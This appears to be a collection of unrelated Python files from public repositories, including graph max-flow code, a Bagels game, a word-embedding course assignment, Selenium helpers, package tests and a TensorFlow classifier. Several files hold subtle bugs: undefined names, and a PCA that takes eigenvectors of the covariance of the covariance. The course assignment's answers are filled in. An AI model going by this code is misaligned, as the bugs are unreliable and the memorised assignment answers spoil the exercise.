getManhattan(self, a,b): (x1, y1) = self.nodos[a] (x2, y2) = self.nodos[b] dx = abs(x1 - x2) dy = abs(y1 - y2) md = dx + dy return(md) def manhattan(self, k, l, p): mu = 10 sigma = 5 lmbd = 2 color = 'black' cantidad = 0 peso1 = 0 peso2 = 0 #conecciones l for i in self.nodos: for j in self.nodos: if (self.getManhattan(i,j) <= l): peso1 = gauss(mu,sigma) peso1 = abs(int(peso1))+1 self.aristas.append((i, j, peso1, color)) self.aristas.append((j, i, peso1, color)) self.vecinos[i].add(j) self.vecinos[j].add(i) elif (random() < p) : color2 = 'blue' cantidad += 1 peso2 = expovariate(lmbd)*mu/4 peso2 = abs(int(peso2))+1 self.aristas.append((i, j, peso2, color2)) self.vecinos[i].add(j) #print('Cantidad de aristas aleatorias ') #print(cantidad) print("Aristas******") print(len(self.aristas)) #print(self.vecinos) def camino(self, s, t, f): # construcción de un camino aumentante cola = [s] usados = set() camino = dict() while len(cola) > 0: u = cola.pop(0) usados.add(u) for (w, v, p, c) in self.aristas: if w == u and v not in cola and v not in usados: actual = f.get((u, v), 0) dif = p - actual if dif > 0: cola.append(v) camino[v] = (u, dif) if t in usados: return camino else: # no se alcanzó return None def FordFulkerson(self, s, t): # algoritmo de Ford y Fulkerson if s == t: return 0 maximo = 0 f = dict() while True: aum = self.camino(s, t, f) if aum is None: break # ya no hay incr = min(aum.values(), key = (lambda k: k[1]))[1] u = t while u in aum: v = aum[u][0] actual = f.get((v, u), 0) # cero si no hay inverso = f.get((u, v), 0) f[(v, u)] = actual + incr f[(u, v)] = inverso - incr u = v maximo += incr return maximo def EliminaArista(self, u,v): f = self.aristas[u] g = self.aristas[v] #print(f) print(g) self.aristas.remove(f) self.aristas.remove(g) #print(self.vecinos) self.vecinos[u].remove(v) if not f: self.vecinos[v].remove(u) print(len(self.aristas)) def EliminaNodo(self, u): vecindad = self.vecinos[u].copy() for i in vecindad: print("quité arista con",i) self.EliminaArista(u,i) for n in self.nodos: if u in self.vecinos[n]: print("uy quité arista con",n) self.EliminaArista(n,u) h = self.nodos.pop(u) print(self.nodos) print(len(self.aristas)) def PlotDiagrama1(self, plot, diagrama): #Diagrama de tiempos with open(plot, "w") as diagrama: print("set term postscript color eps", file = diagrama) print("set output 'DiaLVSFlujo.eps'", file = diagrama) print("set key off", file = diagrama) print("set xlabel 'Flujo Máximo'", file = diagrama) print("set ylabel 'Valores de Distancia L'", file = diagrama) #set logscale y print("set style fill solid 0.25 border -1", file = diagrama) print("set style line 1 lt 1 linecolor rgb 'blue' lw 2 pt 1", file = diagrama) print("set style data boxplot", file = diagrama) #f(x) = 150 * exp(x) - 12 diagrama1 = "plot 'TiempoLVSFM.txt' using 1:2 ls 1 title 'Distancias VS Flujo Máximo' with lines " print(diagrama1, file=diagrama) def PlotDiagrama2(self, plot, diagrama): #Diagrama de tiempos with open(plot, "w") as diagrama: print("set term postscript color eps", file = diagrama) print("set output 'DiaArisVSFlujo.eps'", file = diagrama) print("set key off", file = diagrama) print("set xlabel 'Flujo Máximo'", file = diagrama) print("set ylabel 'Aristas Eliminadas'", file = diagrama) #set logscale y print("set style fill solid 0.25 border -1", file = diagrama) print("set style boxplot outliers pointtype 7", file = diagrama) print("set style data boxplot", file = diagrama) #f(x) = 150 * exp(x) - 12 diagrama2 = "plot 'AristasVSFlujo.txt' using 1:2 " print(diagrama2, file=diagrama) k = 20 n = k * k l = 2 x = 0 flujoMaximo = [] fo = 10 cantAristas = 0 with open("AristasVSFlujo.txt", "a") as f: with open("TiempoEjecucion.txt", "a") as d: for t in range(0, 1): print("Iteracion ------------------------------------------ " + str(l)) G1 = Grafo() G1.puntos("GraficaNodos.txt", k) G1.GraficaNodos("NodosGrid.plot", k) #G1.quitar_nodo(3) TiempoInicial = clock() # Tiempo Inicial G1.manhattan(k, l, p = 0.008) #FlujoMaximo = G1.FordFulkerson(0, n - 1) #print("Flujo Original") #print(FlujoMaximo) G1.Grafica("GrafoGrid.plot", k) FlujoMaximo=0 for x in range(0, fo): print(x) cantAristas = cantAristas + 2 G1.EliminaArista(x, x+1) #G1.EliminaNodo(5) FlujoMaximo = G1.FordFulkerson(0, n - 1) print('Flujo maximo eliminando') print(FlujoMaximo) flujoMaximo.append( FlujoMaximo) f.write('{} {} {} \n'.format(cantAristas , fo, '%.2f' % FlujoMaximo)) TiempoFinal = clock() - TiempoInicial d.write('{} {} \n'.format('%.2f' % TiempoFinal, '%.2f' % x)) print("Tiempo de ejecucion: ") print(TiempoFinal) l += 1 G1.PlotDiagrama2("DiaAriVSFlujo.plot", "AristasVSFlujo")
d649d41ce316b48c42f29c9f9d76f08d614277f3
93e298426c8bc05af9c6dc9ba0d15386a862ada0
/guess v.0.1.1.py
042d33c1099960bdd2c365e5371ffa4f207e4262
[]
no_license
MagicBackup2018/SchoolProject1
de37d24500052495a164192dea346c2441152837
a89d2502f1b83445e967fa7a1f1fb97cd3af71ac
refs/heads/master
2020-04-10T01:51:38.624991
2018-12-07T11:04:46
2018-12-07T11:04:46
160,727,705
0
0
null
null
null
null
UTF-8
Python
false
false
1,798
py
"""Bagels, a number puzzle game. Exercises: 1. Can you guess the number? 2. How much harder is 6 digits? Do you need more guesses? 3. What's the maximum number of digits we could support? Adapted from code in https://inventwithpython.com/chapter11.html """ from random import sample, shuffle digits = 3 guesses = 10 print('I am thinking of a', digits, 'digit number.') print('Try to guess what it is.') print('Here are some clues:') print('When I say: That means:') print(' pico One digit is correct but in the wrong position.') print(' fermi One digit is correct and in the right position.') print(' bagels No digit is correct.') print('There are no repeated digits in the number.') # Create a random number. letters = sample('0123456789', digits) if letters[0] == '0': letters.reverse() number = ''.join(letters) print('I have thought up a number.') print('You have', guesses, 'guesses to get it.') counter = 1 while True: print('Guess #', counter) guess = input() if len(guess) != digits: print('Wrong number of digits. Try again!') continue # Create the clues. clues = [] for index in range(digits): if guess[index] == number[index]: clues.append('fermi') elif guess[index] in number: clues.append('pico') shuffle(clues) if len(clues) == 0: print('bagels') else: print(' '.join(clues)) counter += 1 if guess == number: print('You got it! in ' , counter , 'Guesses') print('Least no. of Guesses is' , counter_least) break if counter > guesses: print('You ran out of guesses. The answer was', number) break
9e169041eceb4d706cd68dba965f55dd679f9a94
c305a0971486efd74b688b43d14432afd99f91e8
/assignments/weekly3/C1_W3_Assignment.py
4fbbcd413cdc97b267c49f1151739a8749edc864
[]
no_license
ckharide/nlplearn
cba1e435bbfd39dda7b15e6f974c63c605a35ede
b614b8c780fdb1064443137de04ef46756aad216
refs/heads/main
2023-04-16T08:18:55.620804
2021-04-27T12:49:49
2021-04-27T12:49:49
352,520,282
0
0
null
null
null
null
UTF-8
Python
false
false
7,186
py
import pickle import numpy as np import pandas as pd #import matplotlib.pyplot as plt from utils import get_vectors data = pd.read_csv('capitals.txt', delimiter=' ') data.columns = ['city1', 'country1', 'city2', 'country2'] # print first five elements in the DataFrame print(data.head(5)) print(data.shape) word_embeddings = pickle.load(open("word_embeddings_subset.p", "rb")) print("Length of word embeddigns " , len(word_embeddings)) # there should be 243 words that will be used in this assignment #print("dimension: {}".format(word_embeddings['Germany'])) def cosine_similarity(A, B): ''' Input: A: a numpy array which corresponds to a word vector B: A numpy array which corresponds to a word vector Output: cos: numerical number representing the cosine similarity between A and B. ''' ### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ### dot = np.dot(A,B) norma = np.linalg.norm(A) normb = np.linalg.norm(B) cos = dot / (norma * normb) ### END CODE HERE ### return cos king = word_embeddings['king'] queen = word_embeddings['queen'] print(cosine_similarity(king, queen)) def euclidean(A, B): """ Input: A: a numpy array which corresponds to a word vector B: A numpy array which corresponds to a word vector Output: d: numerical number representing the Euclidean distance between A and B. """ ### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ### # euclidean distance d = np.linalg.norm(A-B) ### END CODE HERE ### return d print(euclidean(king, queen)) def get_country(city1, country1, city2, embeddings): """ Input: city1: a string (the capital city of country1) country1: a string (the country of capital1) city2: a string (the capital city of country2) embeddings: a dictionary where the keys are words and values are their embeddings Output: countries: a dictionary with the most likely country and its similarity score """ ### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ### # store the city1, country 1, and city 2 in a set called group group = set((city1, country1, city2)) # get embeddings of city 1 city1_emb = embeddings[city1] # get embedding of country 1 country1_emb = embeddings[country1] # get embedding of city 2 city2_emb = embeddings[city2] # get embedding of country 2 (it's a combination of the embeddings of country 1, city 1 and city 2) # Remember: King - Man + Woman = Queen vec = country1_emb - city1_emb + city2_emb # Initialize the similarity to -1 (it will be replaced by a similarities that are closer to +1) similarity = -1 # initialize country to an empty string country = '' # loop through all words in the embeddings dictionary for word in embeddings.keys(): # first check that the word is not already in the 'group' if word not in group: # get the word embedding word_emb = word_embeddings[word] # calculate cosine similarity between embedding of country 2 and the word in the embeddings dictionary cur_similarity = cosine_similarity(word_emb,vec) # if the cosine similarity is more similar than the previously best similarity... if cur_similarity > similarity: # update the similarity to the new, better similarity similarity = cur_similarity # store the country as a tuple, which contains the word and the similarity country = (word, similarity) ### END CODE HERE ### return country country_pred = get_country('Athens', 'Greece', 'Cairo', word_embeddings) print(country_pred) def get_accuracy(word_embeddings, data): ''' Input: word_embeddings: a dictionary where the key is a word and the value is its embedding data: a pandas dataframe containing all the country and capital city pairs Output: accuracy: the accuracy of the model ''' ### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ### # initialize num correct to zero num_correct = 0 # loop through the rows of the dataframe for i, row in data.iterrows(): # get city1 city1 = row['city1'] # get country1 country1 = row['country1'] # get city2 city2 = row['city2'] # get country2 country2 = row['country2'] # use get_country to find the predicted country2 predicted_country2, _ = get_country(city1 , country1 , city2 , word_embeddings) # if the predicted country2 is the same as the actual country2... if predicted_country2 == country2: # increment the number of correct by 1 num_correct += 1 # get the number of rows in the data dataframe (length of dataframe) m = len(data) # calculate the accuracy by dividing the number correct by m accuracy = num_correct / m ### END CODE HERE ### return accuracy accuracy = get_accuracy(word_embeddings, data) print(f"Accuracy is {accuracy:.2f}") def compute_pca(X, n_components=2): """ Input: X: of dimension (m,n) where each row corresponds to a word vector n_components: Number of components you want to keep. Output: X_reduced: data transformed in 2 dims/columns + regenerated original data """ print("Shape of X " , X.shape[1]) ### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ### # mean center the data X_demeaned = X - np.mean(X, axis=0) # calculate the covariance matrix covariance_matrix = np.cov(X, rowvar=False) # calculate eigenvectors & eigenvalues of the covariance matrix eigen_vals, eigen_vecs = np.linalg.eigh(np.cov(covariance_matrix)) # sort eigenvalue in increasing order (get the indices from the sort) idx_sorted = np.argsort(eigen_vals) # reverse the order so that it's from highest to lowest. idx_sorted_decreasing = idx_sorted[::-1] # sort the eigen values by idx_sorted_decreasing eigen_vals_sorted = eigen_vals[idx_sorted_decreasing] # sort eigenvectors using the idx_sorted_decreasing indices eigen_vecs_sorted = eigen_vecs[:,idx_sorted_decreasing] # select the first n eigenvectors (n is desired dimension # of rescaled data array, or dims_rescaled_data) eigen_vecs_subset = eigen_vecs_sorted[:,0:n_components] # transform the data by multiplying the transpose of the eigenvectors # with the transpose of the de-meaned data # Then take the transpose of that product. print(eigen_vecs_subset.T.shape) print(X_demeaned.T.shape) print(X_demeaned.shape) X_reduced = np.dot(eigen_vecs_subset.transpose(),X_demeaned.transpose()).transpose() ### END CODE HERE ### return X_reduced np.random.seed(1) X = np.random.rand(3, 10) X_reduced = compute_pca(X, n_components=2) print("Your original matrix was " + str(X.shape) + " and it became:") print(X_reduced) print(np.asscalar(np.array([1 , 2 , 1])))
b13b4d3b13b0518c818531117f412a5f56a71c10
74a6414e6ea1af00d66ba92f0a62e3a6eaf0fff9
/public/publicMethod.py
0483fb9fd6706f6c46310c80fc69a9d083fd9d5a
[]
no_license
blanchede/jobtest
717b586852fe669d49efc8e98cddc5f7511899f2
16e354a4673c236af55e29a2964162ec43e91e92
refs/heads/master
2021-01-01T17:51:50.999708
2017-07-28T07:01:49
2017-07-28T07:01:49
98,182,003
0
0
null
null
null
null
UTF-8
Python
false
false
1,612
py
#!/user/bin/env python # -*-coding:utf-8-*- from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.common.by import By from selenium.common.exceptions import NoSuchElementException from time import sleep #启动chromdriver driver = webdriver.Remote(command_executor='http://localhost:9515', desired_capabilities=DesiredCapabilities.CHROME) #测试地址 #testUrl="http://devtest.leadswarp.com" testUrl="http://localhost:4200/" #testUrl="http://106.14.139.106:80" #登录需要信息 #测试用户名和密码 userName = "[email protected]" password = "demo" #登录按钮XPath loginXpath = "/html/body/app-root/app-login/div/div/div/div[2]/form/button" #主界面联系人按钮 contactXpath = "//li[3]/div/a/i" settingXpath = "//a[@title='设置']/parent::div" #测试分组固定信息 targetGroupName = "targetGroupTest1" folderName = "folderTest1" newTargetGroupName = "targetGroupTest2" newFolderName = "folderTest2" #公用方法 元素是否存在 class CommonMethod(): def isElementExist(Xpath): s = driver.find_elements(By.XPATH, Xpath) if len(s) == 0: print("元素未找到:%s" % Xpath) return False elif len(s) == 1: return True else: print("找到%s个元素:%s" % (len(s), Xpath)) return False def is_element_present(self, what): try: self.driver.find_element(By.XPATH, what) except NoSuchElementException as e: return False return True
1bcdd525c0ab3623c6d017154cb036bf15b79a66
3950896bb3dcf9a03a9682a17b42bfa3feda3885
/src/vaytrou/vaytrou/tests.py
d931ef4e7366752af20398333357cc1120abb5ae
[]
no_license
sgillies/vaytrou
c02c38579565ddb0d1782600537113e9eafb38b0
89385800491f36a774e8fc4eddd79952a982f115
refs/heads/master
2016-09-09T22:54:00.789976
2013-06-21T23:29:19
2013-06-21T23:29:19
884,337
2
1
null
2016-02-26T00:04:56
2010-09-02T20:59:45
Python
UTF-8
Python
false
false
1,063
py
import shutil import tempfile import vaytrou.admin # Admin tests def test_admin(): admin = vaytrou.admin.IndexAdmin() def foo(*args): pass admin.foo = foo admin.run(['foo', 'bar', 'x']) admin.run(['help', 'info']) admin.run(['info', '--help']) def test_ro_commands(): data = tempfile.mkdtemp() admin = vaytrou.admin.IndexAdmin() admin.run(['-d', data, 'create', 'foo']) admin.run(['-d', data, 'info', 'foo']) admin.run(['-d', data, 'dump', 'foo']) admin.run(['-d', data, 'search', 'foo', '--', '0,0,0,0']) shutil.rmtree(data) def test_batch(): data = tempfile.mkdtemp() admin = vaytrou.admin.IndexAdmin() admin.run(['-d', data, 'create', 'foo']) admin.run(['-d', data, 'batch', 'foo', '-f', 'index-st99_d00.json']) admin.run(['-d', data, 'dump', 'foo']) shutil.rmtree(data) def test_pack(): data = tempfile.mkdtemp() admin = vaytrou.admin.IndexAdmin() admin.run(['-d', data, 'create', 'foo']) admin.run(['-d', data, 'pack', 'foo']) shutil.rmtree(data)
8a7403ed5ad850d888a8b77975d30d6748ac5cfd
38d00b7c5335ecfeee9cd8efdc0d5526ac60102c
/lenskit/algorithms/tf/__init__.py
dc8c5ce09959e2b4f476bf9f2d8171857ee515fb
[ "MIT" ]
permissive
carlos10seg/lkpy
ce07791f241099a4c1e844ba802c7da37e379fb7
7bb2b78a5315a19a182a3d64995c48dbbd42d9d8
refs/heads/master
2023-01-19T02:04:57.192293
2020-11-24T00:06:39
2020-11-24T00:06:39
266,886,328
0
0
MIT
2020-11-23T23:50:32
2020-05-25T21:45:48
Python
UTF-8
Python
false
false
500
py
""" TensorFlow-based algorithms. """ import logging from .util import have_usable_tensorflow from .biasedmf import BiasedMF # noqa: F401 from .ibmf import IntegratedBiasMF # noqa: F401 from .bpr import BPR # noqa: F401 from lenskit.util.parallel import is_mp_worker TF_AVAILABLE = have_usable_tensorflow() _log = logging.getLogger(__name__) if TF_AVAILABLE and is_mp_worker(): _log.info('disabling GPUs in worker process') _tf.config.set_visible_devices([], 'GPU')
0878fdbae5fcd996435a304fd52aa773374222d7
90c6262664d013d47e9a3a9194aa7a366d1cabc4
/tests/storage/cases/test_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE.py
4e3422ecc498a42b1713e07178bccf64f7472514
[ "MIT" ]
permissive
tqtezos/pytezos
3942fdab7aa7851e9ea81350fa360180229ec082
a4ac0b022d35d4c9f3062609d8ce09d584b5faa8
refs/heads/master
2021-07-10T12:24:24.069256
2020-04-04T12:46:24
2020-04-04T12:46:24
227,664,211
1
0
MIT
2020-12-30T16:44:56
2019-12-12T17:47:53
Python
UTF-8
Python
false
false
1,130
py
from unittest import TestCase from tests import get_data from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson class StorageTestKT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(TestCase): @classmethod def setUpClass(cls): cls.maxDiff = None cls.contract = get_data('storage/zeronet/KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE.json') def test_storage_encoding_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self): type_expr = self.contract['script']['code'][1] val_expr = self.contract['script']['storage'] schema = build_schema(type_expr) decoded = decode_micheline(val_expr, type_expr, schema) actual = encode_micheline(decoded, schema) self.assertEqual(val_expr, actual) def test_storage_schema_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self): _ = build_schema(self.contract['script']['code'][0]) def test_storage_format_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self): _ = micheline_to_michelson(self.contract['script']['code']) _ = micheline_to_michelson(self.contract['script']['storage'])
88b2ed689b8e719c2649a84df2cfec7bea1dc0c8
4e2b98c0cc67c447ea1421ae6fbe38842e354024
/train_fuits.py
b3e5807f651762b98847abbe4d55fb2c87e7c1af
[]
no_license
rancher43/fruit_mnist
6c5e3e5f8005de03dd50c1d4fbe78742eac61ce8
34c487352f2e4f7d2172fa16539249ce9a7378de
refs/heads/master
2022-04-13T05:31:35.598412
2020-04-10T20:01:07
2020-04-10T20:01:07
254,723,998
0
0
null
null
null
null
UTF-8
Python
false
false
2,464
py
import tensorflow as tf import numpy as np from tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPool2D, Dropout from tensorflow.keras import Model import pickle print('tensorflow version: ' + tf.__version__) train_images_file = open('train_images', 'rb') train_images = pickle.load(train_images_file) train_images_file.close() train_labels_file = open('train_labels', 'rb') train_labels = pickle.load(train_labels_file) train_labels_file.close() train_ds = tf.data.Dataset.from_tensor_slices((train_images, train_labels)).shuffle(10000).batch(32) # print(train_ds) del train_images del train_labels import gc gc.collect() class CNNModel(Model): def __init__(self): super(CNNModel, self).__init__() self.conv1 = Conv2D(32, 3, padding='same', activation='relu') self.pool1 = MaxPool2D((2, 2)) self.conv2 = Conv2D(64, 3, padding='same', activation='relu') self.pool2 = MaxPool2D((2, 2)) self.flatten = Flatten() self.d1 = Dense(512, activation='relu') self.dropout1 = Dropout(0.4) self.d2 = Dense(128, activation='relu') self.dropout2 = Dropout(0.4) self.d3 = Dense(3, activation='softmax') def call(self, x): x = self.conv1(x) x = self.pool1(x) x = self.conv2(x) x = self.pool2(x) x = self.flatten(x) x = self.d1(x) x = self.dropout1(x) x = self.d2(x) x = self.dropout2(x) x = self.d3(x) return x model = CNNModel() loss_object = tf.keras.losses.CategoricalCrossentropy() optimizer = tf.keras.optimizers.Adam() train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.CategoricalAccuracy(name='train_accuracy') @tf.function def train_step(images, labels): with tf.GradientTape() as tape: predictions = model(images) loss = loss_object(labels, predictions) gradients = tape.gradient(loss, model.trainable_variables) optimizer.apply_gradients(zip(gradients, model.trainable_variables)) train_loss(loss) train_accuracy(labels, predictions) epochs = 5 for epoch in range(epochs): for images, labels in train_ds: train_step(images, labels) model.save_weights('saved_models', save_format='tf') print('Epoch: ' + str(epoch + 1) + ' Loss: ' + str(train_loss.result()), ' Acc: ' + str(train_accuracy.result() * 100)) train_loss.reset_states() train_accuracy.reset_states()
4e14132c8dedc644bde9ccf908cbbd5f2ed82839
d8797e2aaf814a25282f036065e7f5cc4ccf5450
/3. PyTorch/tutorial/gradient2.py
7de9a983b513cc703cc4fda0e0816e03cacd8c60
[]
no_license
ddubbu/AI-Study-with-python
8b38c5f679795899238ccfbd7965ef26d3e0e695
efc05c9977803fc1990e3dbec35541591d165155
refs/heads/master
2020-12-05T21:49:16.973179
2020-08-22T13:11:16
2020-08-22T13:11:16
232,256,387
0
0
null
null
null
null
UTF-8
Python
false
false
102
py
import torch from torch.autograd import Variable a = torch.rand(5) print(a) a = Variable(a) print(var)
1f0b37159950fd92ee3d274aefba1b34e7bc80ce
4703b990612ece92825eec4ad7608ce8fd563f4e
/src/server_handler/definitions.py
052504276a4a1b3df71196ccde5f624fd125f36d
[ "MIT" ]
permissive
robertpardillo/Funnel
69a270ee722f05e6a23eb27d7b3268f916a0d9f8
f45e419f55e085bbb95e17c47b4c94a7c625ba9b
refs/heads/master
2020-03-08T10:15:24.458019
2018-04-04T13:52:04
2018-04-04T13:52:04
128,068,139
1
0
null
null
null
null
UTF-8
Python
false
false
115
py
import os ROOT_DIR = os.path.abspath(os.path.dirname(__file__)) SERVER = 'handler' IS_MULTITHREADING = 0
fb3e3789a52522a4deefa049a55718abb44cd51a
6aa9c8841ab3b86394dff1378106b4c9da57f772
/scripts/plot_trips.py
855638163a1c9028e1702d3f4becf51011ab686d
[]
no_license
dmulholl/taxisim
e185abbfa6dd4c15b10c5c34ee776b3f9911b391
d5cc4a097fede2a2aab528a5cc649ee99d0e290e
refs/heads/master
2021-03-05T20:46:13.953842
2020-08-05T22:47:43
2020-08-05T22:47:43
252,199,551
1
0
null
null
null
null
UTF-8
Python
false
false
913
py
#! /usr/bin/env python3 # ---------------------------------------------------------------------------------------- # This script plots a bar chart showing total daily trip numbers for February 2016 # (08:00 to 12:00). # ---------------------------------------------------------------------------------------- import matplotlib.pyplot as plt days = range(1, 30) labels = [str(day) for day in days] requests = [ 60540, 67177, 70058, 70098, 66502, 53920, 44211, 64821, 68903, 71095, 76731, 73807, 58257, 52000, 58077, 69393, 68484, 70557, 68709, 52110, 46004, 62088, 73405, 78445, 68933, 72920, 57357, 44968, 64270, ] fig, ax = plt.subplots(figsize=(10,5)) ax.bar(days, requests, width=0.9, tick_label=labels) ax.set_xlabel("Day (February 2016)", fontweight='bold', labelpad=10) ax.set_ylabel("Number of Trips", fontweight='bold', labelpad=10) plt.tight_layout() plt.show() fig.savefig("image.eps")
72390b880a83eaa83dcc10b3c8aa9ade7d362a74
043a17d196250048a5a34e990a19d8622436f9ce
/trainingday04/apple_pineapple/pikotaro.py
7eca21f43e639d92300bf23bc479ac724ba2c319
[]
no_license
chimtrangbu/hyperspace
8df8cb9c5475b70b218d0a56034c7f520815fa0d
ec49324c705e9af61c3857cf2dea2a551bda5537
refs/heads/master
2020-03-26T07:18:34.249976
2018-12-20T05:16:55
2018-12-20T05:16:55
144,647,659
0
0
null
null
null
null
UTF-8
Python
false
false
537
py
# Creating a function for return lyrics of pineapple pen def apple_pen(first_ingredient, second_ingredient): des = ['I have a pen, I have a apple\nUh! Apple-Pen!'] des.append('I have a pen, I have a pineapple\nUh! Pineapple-Pen!') des.append('I have a pen, I have a pen\nUh! Long pen!') dic = [['pen', 'apple'], ['pen', 'pineapple'], ['pen', 'pen']] inp = [first_ingredient, second_ingredient] for i in range(3): if dic[i] == inp: return des[i] raise ValueError('It is not in the lyrics')
3b85f1cf324080852822ab4ad0d215c4ba3c2e10
666e6233275d23dda84a24fa55aa38243ec91536
/src/toolshelf/commands/pull.py
cbd24b00f1060b32a525213163e46711a39faee9
[ "MIT" ]
permissive
catseye/toolshelf
5f4dbf8902ddbe4c3fcb2d240fc5b3a977ed2cb0
d597455a57610d34658fa37a3ec8c780996cd65f
refs/heads/master
2020-12-24T06:02:39.836314
2017-05-31T13:42:36
2017-05-31T13:42:36
4,310,103
6
2
null
null
null
null
UTF-8
Python
false
false
497
py
""" Pull latest revision of specified sources from each's upstream repository. Upstream repo is always the external source from which it was originally docked. Does not work on distfile-based sources. pull {<docked-source-spec>} """ # TODO: figure out how to propogate was_changed to a subsequent 'build' from toolshelf.toolshelf import BaseCommand class Command(BaseCommand): def show_progress(self): return False def perform(self, shelf, source): source.update()
4034376ae7eccd5f9a0ccefb3a5ca1d3a8526926
023fc76dfce8366062028d386bdb08407d2bec79
/src/custom_extension_davidlopes.py
40b4a8f9d715eb5cf7bd57990ae74b75346b77c8
[]
no_license
dlopes7/accenture-training-plugins
60fb0c6a83e73cc3f9039d704f7b02f66dedd1a5
931f0592c3a109452fe4069b8e9bd577511a9fa2
refs/heads/master
2022-10-08T15:41:47.103779
2020-06-05T19:33:53
2020-06-05T19:33:53
269,724,007
0
0
null
null
null
null
UTF-8
Python
false
false
1,447
py
import requests import logging from ruxit.api.base_plugin import RemoteBasePlugin log = logging.getLogger(__name__) class CustomExtensionDavidLopes(RemoteBasePlugin): def query(self, **kwargs): meu_nome = "David Lopes" log.info("Extension executando!") grupo = self.topology_builder.create_group(f"{meu_nome} - SpaceX", f"{meu_nome} - SpaceX") navios = self.get_ships() for navio in navios: log.info(navio["ship_name"]) # Cria o custom device id_navio = f'{meu_nome} {navio["ship_id"]}' nome_navio = f'{meu_nome} {navio["ship_name"]}' device = grupo.create_device(id_navio, nome_navio) # Manda uma métrica absoluta (simples) device.absolute("combustivel", navio["fuel"]) # Métrica com dimensões for motor in navio["thrust"]: device.absolute("potencia", motor["power"], dimensions={"Motor": motor["engine"]}) # Propriedades device.report_property("Tipo", navio.get("ship_type", "Desconhecido")) device.report_property("Porto", navio.get("home_port", "Desconhecido")) # Topologia device.add_endpoint(navio["ship_ip"]) # Statetimeseries device.state_metric("clima", navio["weather"]) def get_ships(self): return requests.get(f"{self.config['url']}/v3/ships").json()
d0bdbe1317c6e8a5e655d4787ab7aea35fc7499d
8469f426b47222d8f0c82c5f05131e61ea7bf623
/uri1001/uri1012.py
0df10d3a5b09693f89d938cdeb6e5bbf558eed07
[]
no_license
jamil2gomes/uri-python
493b07448fc9ddc9e86ae30808c0cd7465444281
db3c9ae4dac93c4c03c040ee46a74a6c5987bc11
refs/heads/master
2020-08-23T07:18:13.146535
2019-10-26T01:59:46
2019-10-26T01:59:46
216,568,930
0
0
null
null
null
null
UTF-8
Python
false
false
432
py
valor = input().split(" ") a, b, c = valor pi = 3.14159 triangulo = (float(a) * float(c)) / 2 circulo = pi * (pow(float(c), 2)) trapezio = float(c) * (float(a) + float(b)) / 2 quadrado = pow(float(b), 2) retangulo = float(a) * float(b) print("TRIANGULO: {:.3f}" "\nCIRCULO: {:.3f}" "\nTRAPEZIO: {:.3f}" "\nQUADRADO: {:.3f}" "\nRETANGULO: {:.3f}".format(triangulo, circulo, trapezio, quadrado, retangulo))
a87fd4041d854f92d11a7ddf1b81ef9d504287d2
bd5810c2eeafea74b6d0a3b1017297a69165e487
/Python/list_pair_to_sum/PairToSumFunctions.py
2f0c1a75aa30a77897cd46928e34815646b29c1f
[]
no_license
kpalmberg/Programming
e8d18ec3c0ee50ce72052be2a6170bf35df2b7d7
c8dd5dad081e0682489af84e41c26d823eee0418
refs/heads/master
2020-04-05T20:01:40.614465
2018-11-29T10:17:12
2018-11-29T10:17:12
157,161,312
0
0
null
null
null
null
UTF-8
Python
false
false
3,145
py
class PairFunctions: # Function to determine is a pair exists in the SORTED list which adds to the sum # Linear time: O(n) @staticmethod def pairExistsWithSum_SortedList(sortedList, sum): low = 0 high = len(sortedList) - 1 while low < high: currentPairSum = sortedList[low] + sortedList[high] if currentPairSum == sum: return True elif currentPairSum < sum: low += 1 elif currentPairSum > sum: high -= 1 return False # Function to determine is a pair exists in the unsorted/sorted list which adds to the sum # This method is cleaner code & can deal with an unsorted list as opposed to SortedList method # Linear time: O(n) @staticmethod def pairExistsWithSum_unsortedOrSortedList(L1, sum): compliment = [] for item in L1: if item in compliment: return True compliment.append(sum - item) return False # Returns the index of the first pair in a list that adds to the sum, instead of returning a bool # Runs in Linear time O(n) @staticmethod def getIndexesOfSumPair(nums, sum): dict = {} # Hold compliments and their indexes for index, num in enumerate(nums): if sum - num in dict: # If the compliment for our current num exists in the dictionary # Return the value of the compliment in our dictionary (its index), & our current index return [dict[sum - num], index] dict[num] = index # Add each number at its index to our dictionary # Returns bool if pairs exists or not. Utilizes dictionary instead of list, & enumeration # Runs in Linear time O(n) @staticmethod def getPairEqualSumResult(nums, sum): dict = {} # Hold compliments and their indexes for index, num in enumerate(nums): if sum - num in dict: # If the compliment for our current num exists in the dictionary return True # return True dict[num] = index # Add each number at its index to our dictionary return False # Returns tuple. Tuple includes bool if pair exists with sum, AND the indexes of where the pair exists # We could just call our getPairEqualsSumResult & getIndexesOfSumPair functions, but that would require # more work to be done for the result. Runs in Linear time O(n) @staticmethod def getCompletePairEqualSumResults(nums, sum): dict = {} # Hold compliments and their indexes for index, num in enumerate(nums): if sum - num in dict: # If the compliment for our current num exists in the dictionary return True, [dict[sum - num], index] dict[num] = index # Add each number at its index to our dictionary return False if __name__ == '__main__': L0 = [1, 4, 6, 2, 8] # true expectation sum = 12 test = PairFunctions.getCompletePairEqualSumResults(L0, sum) print(test) print("Entering list L0") #print(pairExistsWithSum_SortedList(L0, sum), "\n")
4d06f0fef0a49eaa87c617682a91228e07778e96
a812e3953ff8da2e1f0eaecb69e09628366ca4ed
/session18/wordcount/urls.py
a61fbead0635aa95f1e10516733163f7bb4bce30
[]
no_license
marobew/project
999c45d0b2c7d1f1f1446d000673bef5924f0a65
f20580a542acb4b64aea035f0fe812dcaca68437
refs/heads/master
2020-06-19T22:26:09.581459
2019-07-16T14:41:44
2019-07-16T14:41:44
null
0
0
null
null
null
null
UTF-8
Python
false
false
164
py
from django.urls import path from . import views urlpatterns = [ path('count/', views.count, name='count'), path('result/', views.result, name='result'), ]
